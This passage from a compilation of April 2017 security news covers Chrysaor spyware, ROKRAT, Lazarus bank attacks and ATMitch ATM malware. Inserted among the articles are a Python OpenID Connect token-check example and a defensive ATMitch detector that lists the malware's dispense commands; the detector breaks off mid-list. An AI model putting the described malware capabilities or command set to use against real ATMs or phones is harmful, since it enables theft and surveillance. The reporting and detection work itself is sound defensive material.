“We’ve contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users.”

The threat was hard to analyse because it has the ability to delete itself when detect any suspicious activity that could be related to its detection.
“Pegasus for Android will remove itself from the phone if:

The SIM MCC ID is invalid
An “antidote” file exists
It has not been able to check in with the servers after 60 days
It receives a command from the server to remove itself

Researchers believe that Chrysaor APK has also been distributed via SMS-based phishing messages, just like Pegasus infection on iOS devices.” reads the analysis published by Lookout.
Chrysaor exploits a well-known Android-rooting exploit called Framaroot to root the device and gain full control over the mobile device.

The experts noticed that the Chrysaor spyware dates back to 2014, which means it is possible that NSO Group has since discovered zero-day vulnerabilities in Android and implemented exploits for them in the latest version of Chrysaor.

Lookout published a detailed analysis of the Chrysaor spyware titled “Pegasus for Android: Technical Analysis and Findings of Chrysaor.”


Update Your Apple Devices to iOS 10.3.1 to Avoid Being Hacked Over Wi-Fi
5.4.2017 thehackernews Apple
Less than a week after Apple released iOS 10.3 with over 100 bug fixes and security enhancements, the company has pushed an emergency patch update, iOS 10.3.1, to address a few critical vulnerabilities, one of which could allow hackers to "execute arbitrary code on the Wi-Fi chip."
The vulnerability, identified as CVE-2017-6975, was discovered by Google's Project Zero staffer Gal Beniamini, who noted on Twitter that more information about the flaw would be provided tomorrow.
Apple also did not provide any technical details on the flaw, but urged iPhone, iPad and iPod Touch users to update their devices as soon as possible.
In the security note accompanying iOS 10.3.1, Apple describes the issue as a stack buffer overflow vulnerability, which the company addressed by improving the input validation.
A stack buffer overflow occurs when data written to a buffer on the execution stack exceeds the memory reserved for it, overwriting adjacent stack memory, which an attacker who controls that data can abuse to execute malicious code.
The flaw allows an attacker, within range, to execute malicious code on the phone's Wi-Fi chip.
The vulnerability appears to affect iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation, and later devices running the iOS 10.3 operating system.
It's worth mentioning that iPhone 5 and iPhone 5C were Apple's last iPhone handsets to have a 32-bit processor with Apple A6 system on a chip. Since iPhone 5S has a 64-bit processor, it is not affected by the issue.
To know more technical details about the flaw, you are required to wait until tomorrow when Beniamini will release a detailed blog post describing the bug and its impact on Apple users.
With the iOS 10.3 release, an over-the-air download was not available for 32-bit Apple devices. This has also been changed with the iOS 10.3.1 update, which brings back support for the iPhone 5 and 5C as well as the fourth-generation iPad -- the only remaining 32-bit Apple devices.
The iOS 10.3.1 update can be downloaded over-the-air via Settings → General → Software Update on your iOS device.
Apple users running iOS 10.3 should be able to see the iOS 10.3.1 update, so press on the "Download and Install" button to install the update.


Ecuador's New President Warns Assange Not to 'Meddle'

4.4.2017 securityweek BigBrothers
Ecuador's President-elect Lenin Moreno warned Julian Assange on Tuesday not to meddle in the country's politics, after the WikiLeaks founder taunted a rival candidate following his loss.

Moreno's election victory Sunday was a relief for Assange, who has been holed up in Ecuador's London embassy since 2012 to avoid arrest.

The socialist president-elect's conservative rival, Guillermo Lasso, had vowed to kick Assange out of the embassy.

But Moreno had some stern words after Assange took to Twitter to celebrate Lasso's loss.

"Mr Julian Assange must respect the condition (of asylum) he is in and not meddle in Ecuadoran politics," he said at a news conference.

As results showed Lasso losing on election night, Assange had exuberantly turned around the right-wing candidate's threat to expel him within 30 days.

"I cordially invite Lasso to leave Ecuador within 30 days (with or without his tax haven millions)," he tweeted -- a reference to allegations the ex-banker has money stashed in offshore accounts.

Assange fled to the embassy to avoid arrest and extradition to Sweden, where he faces a rape allegation.

The 45-year-old Australian, who denies the allegation, says he fears Sweden would send him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents in 2010.

Outgoing President Rafael Correa, a fiery critic of the US, granted Assange asylum, and Moreno has vowed to uphold it.

Assange's case has returned to the spotlight since WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and her Democratic party.

That created an awkward situation for the Ecuadoran government, which responded by temporarily restricting his internet access.


New RAT Uses Popular Sites for Command and Control

4.4.2017 securityweek Virus
A newly discovered remote administration tool (RAT) uses popular legitimate websites for its command and control (C&C) communication and for the exfiltration of data, Talos researchers say.

Dubbed ROKRAT, the tool is distributed via email with a malicious Hangul Word Processor (HWP) document and targets victims in Korea, where the Office alternative is highly popular. Researchers found that one of the malicious spear phishing emails was sent from the email server of Yonsei, a private university in Seoul. To add legitimacy to the email, the attackers used the contact email of the Korea Global Forum as the sender’s address.

The malicious HWP document contained an embedded Encapsulated PostScript (EPS) object aimed at exploiting a well-known vulnerability (CVE-2013-0808) to download a binary masquerading as a .jpg file. When the file is decoded and executed, the ROKRAT malware is installed on the victim’s machine, Talos explains.

The RAT shows increased complexity by using legitimate websites such as Twitter, Yandex, and Mediafire as its C&C communication and exfiltration platforms. Not only are these websites difficult to block globally within organizations, but they also use HTTPS connectivity, which makes it difficult to identify specific patterns.

“One of the samples analyzed only uses Twitter to interact with the RAT, while the second one additionally uses the cloud platforms: Yandex and Mediafire. The Twitter tokens we were able to extract are the same in both variants. There is obvious ongoing effort to add features to this RAT to allow for more sophisticated levels of attacks,” Talos notes.

Upon analysis, the security researchers discovered that the RAT doesn’t work on Windows XP systems and also packs detection evasion capabilities, as it checks the compromised system for a series of tools used for malware analysis or within sandbox environments. Should such tools be discovered, the malware jumps to a fake function which generates dummy HTTP traffic.

For communication with the C&C platforms, the malware uses 12 hardcoded tokens (7 different Twitter API tokens, 4 Yandex tokens, and one Mediafire account). The malware checks the last message on the Twitter timeline to receive orders and can also tweet; and can download and execute files or upload stolen documents to disks in the Yandex cloud or Mediafire.

The malware also packs keylogging capabilities, and one of the samples was also observed taking screenshots of the infected systems, researchers say.

The actor behind this campaign is a motivated one, Talos notes. The RAT is innovative, using novel communication channels that are difficult to contain within organizations. Furthermore, the malware includes a series of exotic features, such as the ability to perform requests to legitimate websites (Amazon and Hulu) if executed in a sandbox.

“This investigation shows us once again that South Korean interests attract sophisticated threat actors. In this specific case, the actor compromised a legitimate email address of a big forum organized by a university in Seoul in order to forge the spear phishing email which increased the chance of success. And we know that it was a success, during the writing of the article we identified infected systems communicating with the command & control previously mentioned,” Talos concludes.


NoMoreRansom Expands with New Decryptors, Partners

4.4.2017 securityweek Virus
NoMoreRansom, a project launched in 2016 by Europol, the Dutch National Police, Kaspersky Lab and Intel Security (now once again McAfee) has published its latest progress report. NoMoreRansom collects the available ransomware decryption tools into a single portal that victims can use to recover encrypted files without having to pay the criminals.

Since the last Europol update in December 2016, the project's decryption library has been supplemented by the addition of 15 new decryption tools. The catalogue of project partners has expanded by 30 to 76 public and private members, including the law enforcement agencies of Australia, Belgium, Israel, South Korea, Russia and Ukraine; and Interpol. SentinelOne and Verizon Enterprise Solutions are among the new private members.

The full list of available decryption tools can be found here, while the project members can be found here.

According to Europol, 10,000 ransomware victims from all over the world have regained their files through NoMoreRansom since the last December update. Statistics show that most visitors to the platform come from Russia, the Netherlands, the United States, Italy and Germany.

One of the new decryptors, provided by Bitdefender, rescues files from the Bart family of ransomware. "The tool," says Bitdefender, "is a direct result of successful collaboration between Bitdefender, Europol and Romanian police, supporting the 'No More Ransom' initiative kick started by Europol's European Cybercrime Centre."

Unlike other ransomware families, Bart does not require an internet connection to encrypt the victim's files, although one is required to receive the decryption key from the attacker's C&C server. The malware doesn't function if the computer's language is detected as Russian, Belorussian, or Ukrainian -- "most probably," suggests Bitdefender, "because it was written by a Russian speaking hacker."

The developers of Bart are the same criminal gang as those behind the Dridex and Locky ransomware strains.

Losses to ransomware continue to increase, rising by 300% from 2015 to 2016 to an estimated total of $1 billion. Estimates for 2017 indicate that the threat is still growing.


Kantara Initiative Assists With EU Privacy and GDPR Issues

4.4.2017 securityweek Privacy
The US-based Kantara Initiative announced today that it has joined the European Trust Foundation to help its non-EU government and corporate members engage with Europe on pan-jurisdiction federated digital identity, trust and privacy initiatives.

The advent of the General Data Protection Regulation (GDPR) turns Kantara's development of good business practices into legal requirements for any enterprise that has a single customer within the European Union. The new alliance will make it easier for US business to engage with the European Commission over such issues.

There are still fundamental misconceptions in the common understanding of the GDPR: firstly, that it only involves European companies; and secondly, that it solely concerns the protection of personal data from being hacked. Neither is true. Any company anywhere in the world that trades with Europe is affected; and data protection now involves far more than the protection of data. GDPR shifts emphasis from company security to involved customer protection: secure customer relations are now a focus.

The issue is demonstrated by GDPR's 'consent' requirements. For a business to process personal data, it must now obtain consent, defined in article 4(11) as "any freely given, specific, informed and unambiguous indication of the data subject's wishes by which he or she by statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her."

The details, requiring explicit informed consent (tick boxes and obscure T&Cs are no longer sufficient), will require changes to business practices. But consent can also be withdrawn -- and that will require changes to business processes. Commercial enterprises will need to manage consent as effectively as they manage identity; and indeed, the two become woven together.

This is where Kantara comes in. Its Consent Receipt Specification is a record of consent provided to an individual at the time the consent is given. The purpose is effectively to verify a consent contract, but it also provides a mechanism for the withdrawal of that consent. Coupled with a second evolving Kantara specification, User Managed Access (UMA) -- which enables the user to control how his or her data is shared -- these new initiatives could help provide a solution to the GDPR consent requirements.

Kantara's new relationship with the European Trust Foundation, which has a history of working closely with the European Commission, will help US consent mechanisms be accepted as adequate for the GDPR. But it is not just a one-way matter of compliance. It doesn't simply provide part of the legal basis for the transfer of personal data out of the EU; it is also part of the legal basis for making automated decisions relating to that personal information.

Consent receipts and user managed access are not simply a GDPR solution, they are good practices for the modern world. User trust in vendors' use of PII is low. If that can be improved so that secure customer relations can replace old-style hidden and obfuscated personal data collection, then new avenues for business will emerge.

In Kantara's own words, "When individuals are forced to sign organization-centric privacy policies/ terms of use, then this places limitations on the information that will be shared. If such constraints were removed, and capabilities built on the side of the individual, then new, rich information will flow -- including actual demand data (as opposed to derived/ predicted demand)."

But whatever solutions to GDPR requirements are chosen by US (or any non-EU) business, they will need to be accepted as adequate by the European Union -- and this is the aim of the new relationship between Kantara and the European Trust Foundation. "The European Trust Foundation aims to provide a valuable service to Kantara members located outside of Europe by helping to streamline the engagement process with the EU," said Colin Wallis, executive director, Kantara Initiative. "The foundation and organizations like Kantara act as a 'staging area' to help expedite the process of gathering information and presenting a common voice for non-EU countries to approach and engage with the EU on GDPR."


Google Announces New Accounts Sign-in Rules

4.4.2017 securityweek Safety
Google on Monday announced the rollout of a new Accounts sign-in page and of a series of updates to the policies that 3rd-party Single Sign-On (SSO) providers should comply with.

Starting on April 5, 2017, users will benefit from an updated experience when securely signing into their accounts, courtesy of a new Google Accounts login page. The new design, Google says, is meant to make the browser login experience consistent across computers, phones and tablets.

This change, Google also announced, is expected to impact organizations that use third-party applications within their networks, as well as those using a third-party SSO provider. “We recommend contacting your developer(s) or SSO provider to see if any updates are necessary,” Google says.

In a separate announcement, the Internet giant revealed that the changes affect Google and 3rd-party applications on iOS, mobile browsers on iOS and Android, and web browsers (Chrome, Firefox and other modern browsers).

Starting April 5, users of 3rd-party SSO providers will be better informed about the account they’re authenticating with as well as the permissions they’re granting to applications. Android applications using the standard authentication libraries already prompt users to select the appropriate account, so these changes will not affect them, the company reveals.

“It’s important that your users are presented with account information and credential consent, and apps should make this process easy and clear. One new change that you may now see is that only non-standard permission requests will be presented in the secondary consent screen in your application,” Google explains.

At the moment, app permissions requested by an application are displayed together, but users should have greater visibility into permissions being requested beyond the standard “email address” and “profile” consent, Google says. If additional permissions are requested by the app, a secondary consent screen is displayed.

Users will also have greater visibility into the 3rd-party application’s name and will be able to click through to get the developer’s contact information. Thus, application developers should use public-facing email addresses so that users can easily contact them for support or assistance.

“If your application may also be used by G Suite customers that employ a 3rd-party Single Sign-On (SSO) service, we recommend that you utilize the hd and/or login_hint parameters, if applicable. Even with the changes to the 3rd-party SSO auth flow, these parameters will be respected if provided. You can review the OpenID Connect page in the documentation for more information,” Google also notes.

G Suite users may notice redirection when signing into 3rd-party SSO providers as well. When no accounts are signed in, the user will be prompted to confirm the account after signing in to the 3rd-party SSO provider, which is meant to ensure that they’re signed in with the correct G Suite account. Users automatically opt into “email address” and “profile” consent, but will be redirected back to the application once they consent to any additional non-standard permissions that may be requested.

If the user is already signed in to one or more accounts matching the hd hint, the Account Chooser will display all the accounts and the user will have to select the appropriate G Suite account. Next, the user will be redirected to the 3rd-party SSO provider, then back to the application.
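To illustrate how the hd and login_hint parameters described above fit into the OpenID Connect request, and why a relying party must verify the hd claim in the returned ID token rather than trust the hint, here is an added example in Python (not Google's own code or code from the original article). The authorization endpoint, parameter names and claim names are Google's documented ones; the client ID, redirect URI and token claims are constructed sample values.

```python
import time
from urllib.parse import urlencode, urlparse, parse_qs

# Google's OpenID Connect authorization endpoint (documented value).
GOOGLE_AUTH_ENDPOINT = "https://accounts.google.com/o/oauth2/v2/auth"

# Google issues ID tokens with either of these issuer strings.
GOOGLE_ISSUERS = ("https://accounts.google.com", "accounts.google.com")


def build_auth_url(client_id, redirect_uri, state, nonce, hd=None, login_hint=None):
    """Build the authorization request URL a web app redirects the user to.

    `hd` pre-selects a G Suite domain in the Account Chooser and `login_hint`
    pre-fills the account; both are hints to the sign-in UI (respected even
    when a 3rd-party SSO provider is in the flow), not security controls.
    """
    params = {
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "response_type": "code",
        "scope": "openid email profile",  # the standard consent set
        "state": state,  # anti-CSRF value bound to the user's session
        "nonce": nonce,  # replay protection, echoed back in the ID token
    }
    if hd:
        params["hd"] = hd
    if login_hint:
        params["login_hint"] = login_hint
    return f"{GOOGLE_AUTH_ENDPOINT}?{urlencode(params)}"


def query_params(url):
    """Return the query string of `url` as a dict of single values."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


def check_id_token_claims(claims, expected_aud, expected_nonce,
                          expected_hd=None, now=None):
    """Validate the claims of an ID token whose signature is already verified.

    Signature verification against Google's published keys is assumed to
    have happened before this call; this function enforces the claim values
    the relying party itself is responsible for.  Returns (ok, reason).
    """
    now = time.time() if now is None else now
    if claims.get("iss") not in GOOGLE_ISSUERS:
        return False, "unexpected issuer"
    if claims.get("aud") != expected_aud:
        return False, "token issued for a different client"
    if claims.get("nonce") != expected_nonce:
        return False, "nonce mismatch (possible replay)"
    if claims.get("exp", 0) <= now:
        return False, "token expired"
    if expected_hd is not None:
        # The hd *parameter* only filters the Account Chooser; a user can
        # still complete sign-in with any Google account.  Restricting the
        # app to one G Suite domain means checking the hd *claim* Google
        # places in the ID token, which is absent for consumer accounts.
        if claims.get("hd") != expected_hd:
            return False, "account is not in the expected G Suite domain"
        if claims.get("email_verified") is not True:
            return False, "email address not verified by Google"
    return True, "ok"
```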


Turla Linked to One of the Earliest Cyberespionage Operations

4.4.2017 securityweek Virus
Researchers at Kaspersky Lab and King’s College London have identified a link between the Russian-speaking threat actor Turla and Moonlight Maze, one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.

In around 1996, a threat group believed to be located in Russia had started spying on organizations in the United States, including the Pentagon, the Department of Energy and NASA. The actor had stolen vast amounts of sensitive information from universities, military and research organizations. The activities of the group, dubbed Moonlight Maze, were first made public in 1999 and detailed last year at Kaspersky’s SAS conference by Thomas Rid of King's College London.

Experts have dug further into Moonlight Maze’s activities and at this year’s SAS conference they presented evidence linking the threat actor to Turla. If Turla does in fact turn out to be an evolution of Moonlight Maze, that would make it one of the earliest and longest cyber espionage operations, along with the NSA’s Equation Group, which is also believed to have been active since the mid ‘90s.

Turla is also known as Waterbug, KRYPTON and Venomous Bear, and some of its primary tools are tracked as Turla (Snake and Uroburos) and Epic Turla (Wipbot and Tavdig). The threat actor has been linked to the Agent.BTZ malware, which indicates that Turla may have been active since as early as 2006.

Kaspersky and King’s College London researchers found valuable information after learning of David Hedges, a now-retired administrator who got to watch Moonlight Maze in action when one of his servers was compromised by the threat group back in 1998. Hedges had allowed the attackers to keep using his server in order to help the Metropolitan Police in London and the FBI track the team’s activities.

Hedges still had the old server, which recorded data between 1998 and 1999, allowing the researchers to analyze the tools used at the time by Moonlight Maze.

The analysis showed that the attackers compiled most of their tools on UNIX operating systems such as Solaris and IRIX. One of the third-party tools they used was LOKI2, an open-source backdoor released in 1996.

LOKI2 has provided a link to Penquin Turla, a Linux backdoor identified by Kaspersky Lab in 2014. Penquin Turla’s code was compiled for Linux kernel versions released in 1999, and the malware was based on LOKI2, which had been designed for covert data exfiltration.

Researchers believe the Penquin Turla codebase was primarily developed between 1999 and 2004, but the malware was also spotted in the 2011 attack on Swiss defense firm RUAG, and a new sample was uploaded to the VirusTotal service in March 2017. The experts’ theory is that the hackers dusted off the old code and reused it in attacks aimed at highly secure entities whose defenses may have been more difficult to breach using the group’s typical Windows toolset.

While the use of LOKI2 source code and other similarities do provide a link between Turla and Moonlight Maze, more evidence is needed before researchers can say with certainty that the former is an evolution of the latter.

Further evidence may be found in data collected from a campaign dubbed Storm Cloud. The Wall Street Journal reported in 2001 that this operation had also involved LOKI2, but researchers currently have little information on Storm Cloud.


Kaspersky Links Global Cyber Attacks to North Korea

4.4.2017 securityweek BigBrothers
ST. MAARTEN – SECURITY ANALYST SUMMIT – Just days after reports surfaced that U.S. prosecutors were preparing to point fingers at the North Korean government for directing the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016, Kaspersky Lab unveiled new details on the hacking group believed to be conducting the attack and several others.

Considered to be one of the largest and most successful cyber heists ever, Kaspersky said there is a “high chance” that the attacks were conducted by Lazarus, a North Korea-linked hacking group responsible for a series of regular and destructive attacks, including the devastating attack against Sony Pictures in late 2014.

On Monday at Kaspersky Lab’s Security Analyst Summit in St. Maarten, the Moscow-based security firm shared its findings on the malicious tools the group uses and how it operates.

The company also said that it managed to disrupt other potential Lazarus operations attempting to steal funds from unnamed banks in Southeast Asia and Europe.

While Kaspersky’s team believes Lazarus to be a large group focused on infiltration and espionage operations, the company said a “substantially smaller” unit within the group, responsible for financial profit, exists, which they have dubbed Bluenoroff.

In February, researchers discovered an attack aimed at banks in Poland that was linked back to Lazarus. As part of the operation, the attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) so malware would be served to its visitors.

“The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many,” Kaspersky explained. “Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.”

Since December 2015, Kaspersky Lab has detected malware samples related to Lazarus group activity at financial institutions, casinos, software developers for investment companies and crypto-currency businesses in Korea, Bangladesh, India, Vietnam, Indonesia, Costa Rica, Malaysia, Poland, Iraq, Ethiopia, Kenya, Nigeria, Uruguay, Gabon, Thailand and several other countries.

Recent forensic analysis conducted by a Kaspersky Lab partner of a C2 server in Europe used by the Lazarus/Bluenoroff group also provided some interesting North Korea-related discoveries.

“Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2,” Kaspersky Lab's Global Research & Analysis Team explained in a blog post. “Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.”

Other firms, including BAE Systems and Symantec, previously had linked the Bangladesh theft to a series of cyber-attacks on the U.S. financial system and the hacking of Sony Pictures.

Still an Active Threat

Kaspersky’s team believes that Lazarus will remain one of the biggest threats to banking, finance and other firms for the next few years.

“We’re sure they’ll come back soon. In all, attacks like the ones conducted by Lazarus group show that a minor misconfiguration may result in a major security breach, which can potentially cost a targeted business hundreds of millions of dollars in loss,” said Vitaly Kamluk, head of the Global Research and Analysis Team APAC at Kaspersky Lab. “We hope that chief executives from banks, casinos and investment companies around the world will become wary of the name Lazarus.”

North Korea Cyber Attack Attribution

While Kaspersky Lab did not officially accuse North Korea as being behind the attacks, the firm did display a strong case against the Hermit State. "This is the first time we have seen a direct link between Bluenoroff and North Korea," the company said. "Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation."

In a presentation at the Security Analyst Summit, Kamluk said that, while unlikely, another group could have invested a huge amount of money to frame North Korea. He also speculated that a third force could be involved to help North Korea from the outside.

Kaspersky has published a detailed report (PDF), which includes infiltration methods, their relation to attacks on SWIFT software, and insights on attribution. The report also includes Indicators of Compromise (IOC) and other data to help defenders detect possible Lazarus-related activity in their networks. They also produced a short video summarizing the activity of the group.



Hackers stole $800,000 from ATMs using Fileless Malware
4.4.2017 thehackernews Virus
Hackers targeted at least 8 ATMs in Russia and stole $800,000 in a single night, but the method used by the intruders remained a complete mystery with CCTV footage just showing a lone culprit walking up to the ATM and collecting cash without even touching the machine.
Even the affected banks could not find any trace of malware on their ATMs or back-end network, or any sign of an intrusion. The only clue the unnamed bank's specialists found on an ATM's hard drive was two files containing malware logs.
The log files included the two process strings containing the phrases: "Take the Money Bitch!" and "Dispense Success."
This small clue was enough for the researchers from the Russian security firm Kaspersky, who have been investigating the ATM heists, to find malware samples related to the ATM attack.
In February, Kaspersky Labs reported that attackers managed to hit over 140 enterprises, including banks, telecoms, and government organizations, in the US, Europe and elsewhere with the 'Fileless malware,' but provided few details about the attacks.
According to the researchers, the attacks against banks were carried out using a Fileless malware that resides solely in the memory (RAM) of the infected ATMs, rather than on the hard drive.
Now during the Kaspersky Security Analyst Summit in St. Maarten on Monday, security researchers Sergey Golovanov and Igor Soumenkov delved into the ATM hacks that targeted two Russian banks, describing how the attackers used the fileless malware to gain a strong foothold into bank's systems and cash out, ThreatPost reports.
Mysterious ATM Hack Uncovered by Researchers
Dubbed ATMitch, the malware — previously spotted in the wild in Kazakhstan and Russia — is remotely installed and executed on ATMs via its remote administration module, which gives hackers the ability to form an SSH tunnel, deploy the malware, and then send the command to the ATM to dispense cash.
Since Fileless malware uses the existing legitimate tools on a machine so that no malware gets installed on the system, the ATM treats the malicious code as legitimate software, allowing remote operators to send the command at the time when their associates are present on the infected ATM to pick up the money.
This ATM theft takes just a few seconds to complete without the operator physically going near the machine. Once the ATM has been emptied, the operator 'signs off,' leaving very little trace, if any, of the malware.
However, this remote attack is possible only if an attacker tunnels in through the bank's back-end network, a process that requires far more sophisticated network intrusion skills.
A Very Precise Form of Physical Penetration
Since opening the ATM's panel directly could also trigger an alarm, attackers switched to a very precise form of physical penetration: drilling a golf-ball-sized hole in the ATM's front panel to gain direct access to the cash dispenser using a serial distributed control (SDC, RS485 standard) wire.
This method was revealed when Golovanov and Soumenkov were able to reverse engineer the ATM attack after police arrested a man dressed as a construction worker while he was drilling into an ATM to inject malicious commands in the middle of the day to trigger the machine’s cash dispenser.
The suspect was arrested with a laptop, cables, and a small box. Although the researchers did not name the affected ATM manufacturer or the banks, they warn that ATM burglars have already used the ATM drill attack across Russia and Europe.
In fact, this technique also affects ATMs around the world, leaving them vulnerable to having their cash drawn out in a matter of minutes.
Currently, the group or country behind these ATM hacks is unknown, but coding present in the attack contains references to the Russian language, and the tactics, techniques, and procedures bear a resemblance to those used by bank-robbing gangs Carbanak and GCMAN.
Fileless malware attacks are becoming more frequent. Just last month, researchers found a new fileless malware, dubbed DNSMessenger, that uses DNS queries to conduct malicious PowerShell commands on compromised computers, making the malware difficult to detect.


Google just discovered a dangerous Android Spyware that went undetected for 3 Years
4.4.2017 thehackernews Android
An Android version of one of the most sophisticated pieces of mobile spyware has been discovered; it remained undetected for at least three years thanks to its smart self-destruction capabilities.
Dubbed Chrysaor, the Android spyware has been used in targeted attacks against activists and journalists mostly in Israel, but also in Georgia, Turkey, Mexico, the UAE and other countries.
Chrysaor espionage malware, uncovered by researchers at Lookout and Google, is believed to have been created by the same Israeli surveillance firm, NSO Group Technologies, which was behind the Pegasus iOS spyware initially detected in targeted attacks against human rights activists in the United Arab Emirates last year.
NSO Group Technologies is believed to produce the most advanced mobile spyware on the planet and to sell it to governments and law enforcement agencies worldwide, as well as to dictatorial regimes.

The newly discovered Chrysaor spyware has been found installed on fewer than three-dozen Android devices, although researchers believe that there were more victims before its detection, who most likely have either formatted or upgraded their phones.
"Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps," Google said in its own blog post published Monday.
"We've contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users."

Just like Pegasus for iOS, the newly discovered Chrysaor for Android also offers a wide array of spying functions, including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling device remotely from SMS-based commands.
Recording Live audio and video.
Keylogging and Screenshot capture.
Disabling of system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destruct to evade detection.
"If it feels like it's going to be found, it removes itself," said Lookout Security researcher Michael Flossman. "That's why it took so long to find these samples."
Researchers believe that Chrysaor APK has also been distributed via SMS-based phishing messages, just like Pegasus infection on iOS devices.
While Pegasus leveraged three then-zero day vulnerabilities in Apple's iOS operating system to jailbreak the targeted iOS devices, Chrysaor uses a well-known Android-rooting exploit called Framaroot to root the device and gain full control over the operating system.
Since Chrysaor dates back to 2014, it is possible that NSO Group has since discovered zero-day vulnerabilities in Android and deployed them in the latest version of Chrysaor for Android, Lookout warned.
Lookout has also provided full, technical details on Chrysaor in its report [PDF] titled "Pegasus for Android: Technical Analysis and Findings of Chrysaor." So, you can head on to the link for a more detailed explanation on the malware.
How to Protect your Android device from Hackers? Google recommends that users install apps only from reputable sources, protect their device with a PIN or password lock, enable the 'Verify Apps' feature in settings, and, obviously, keep the device up to date with the latest security patches.


Malware Allows Remote Administration of ATMs

4.4.2017 securityweek Virus
A recently discovered piece of malware allows attackers to remotely control compromised ATMs (automated teller machines), Kaspersky Lab reveals.

The threat was discovered after a Russian bank was hit by a targeted attack where cybercriminals gained control of ATMs and uploaded malware to them. Although the actors did remove the malware after the heist, which left researchers without an executable to analyze, the malware’s logs and some file names were restored after the attack, which Kaspersky researchers were able to analyze.

The files were recovered by the bank’s forensic team, which provided the security researchers with two text files (located at C:\Windows\Temp\kl.txt and C:\logfile.txt), and the names of two deleted executables (C:\ATM\!A.EXE and C:\ATM\IJ.EXE). However, the contents of the exe files couldn’t be retrieved, Kaspersky notes.

Based on the information retrieved from the log files, the researchers created a YARA rule to find a sample, and eventually found one, in the form of “tv.dll”. This in turn led to the discovery of ATMitch, a piece of malware that essentially provides attackers with the ability to remotely administrate ATMs.

The malware is installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank. Once on the infected machine, the threat looks for the “command.txt” file located in the same directory as the malware itself, as this file includes a list of one character commands: ‘O’ – Open dispenser; ‘D’ – Dispense; ‘I’ – Init XFS; ‘U’ – Unlock XFS; ‘S’ – Setup; ‘E’ – Exit; ‘G’ – Get Dispenser id; ‘L’ – Set Dispenser id; and ‘C’ – Cancel.

After that, the malware writes the results of the command to the log file and removes "command.txt" from the ATM's hard drive. ATMitch, which apparently doesn't try to conceal itself within the system, uses the standard XFS library to control the ATM, meaning that it can be used on all ATMs that support the XFS library.
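The command-file cycle described above (command.txt dropped beside the malware, one-character commands consumed, file deleted) lends itself to a simple host-side detection. The following Python sketch is an added example, not Kaspersky's code: it replays constructed file-system audit events (the event schema is an assumption; the paths are modelled on the ones in the write-up) and flags a command.txt that is created next to an executable, decodes the commands written to it, and records its deletion.

```python
"""Detection sketch for the ATMitch command.txt cycle (constructed example)."""
from collections import defaultdict
from dataclasses import dataclass
import ntpath

# One-character commands listed in the Kaspersky write-up.
ATMITCH_COMMANDS = {
    "O": "Open dispenser", "D": "Dispense", "I": "Init XFS",
    "U": "Unlock XFS", "S": "Setup", "E": "Exit",
    "G": "Get Dispenser id", "L": "Set Dispenser id", "C": "Cancel",
}
CASH_OUT = {"O", "D"}  # commands that actually move cash


@dataclass
class FsEvent:
    """A minimal file-system audit record (hypothetical schema)."""
    ts: int            # seconds since an arbitrary epoch
    action: str        # "create", "write" or "delete"
    path: str          # Windows path
    content: str = ""  # content captured on write, if the sensor provides it


@dataclass
class Finding:
    directory: str
    binaries: list     # executables/DLLs seen in the same directory
    commands: list     # decoded command names, in the order written
    cash_out: bool     # True if an Open/Dispense command was issued
    lifetime_s: int    # seconds between create and delete of command.txt


def parse_command_chars(text):
    """Return the known command characters in text, ignoring anything else."""
    return [c for c in text.upper() if c in ATMITCH_COMMANDS]


def detect_atmitch_cycles(events, max_lifetime_s=600):
    """One Finding per directory where command.txt was created and then
    deleted within max_lifetime_s, with a .dll/.exe in the same directory."""
    by_dir = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        by_dir[ntpath.dirname(ev.path).lower()].append(ev)

    findings = []
    for directory, evs in by_dir.items():
        binaries = sorted({ntpath.basename(e.path) for e in evs
                           if e.path.lower().endswith((".dll", ".exe"))})
        if not binaries:
            continue  # a lone command.txt is not the ATMitch pattern
        created_at, chars = None, []
        for e in evs:
            if ntpath.basename(e.path).lower() != "command.txt":
                continue
            if e.action == "create":
                created_at, chars = e.ts, []
            elif e.action == "write" and created_at is not None:
                chars.extend(parse_command_chars(e.content))
            elif e.action == "delete" and created_at is not None:
                lifetime = e.ts - created_at
                if lifetime <= max_lifetime_s:
                    findings.append(Finding(
                        directory=directory, binaries=binaries,
                        commands=[ATMITCH_COMMANDS[c] for c in chars],
                        cash_out=bool(set(chars) & CASH_OUT),
                        lifetime_s=lifetime))
                created_at, chars = None, []
    return findings


# Constructed sample events: a malicious cycle in C:\ATM (path from the
# write-up) and a benign command.txt with no binary beside it.
SAMPLE_EVENTS = [
    FsEvent(100, "create", r"C:\ATM\IJ.EXE"),
    FsEvent(101, "create", r"C:\ATM\command.txt"),
    FsEvent(102, "write", r"C:\ATM\command.txt", "I U O D E"),
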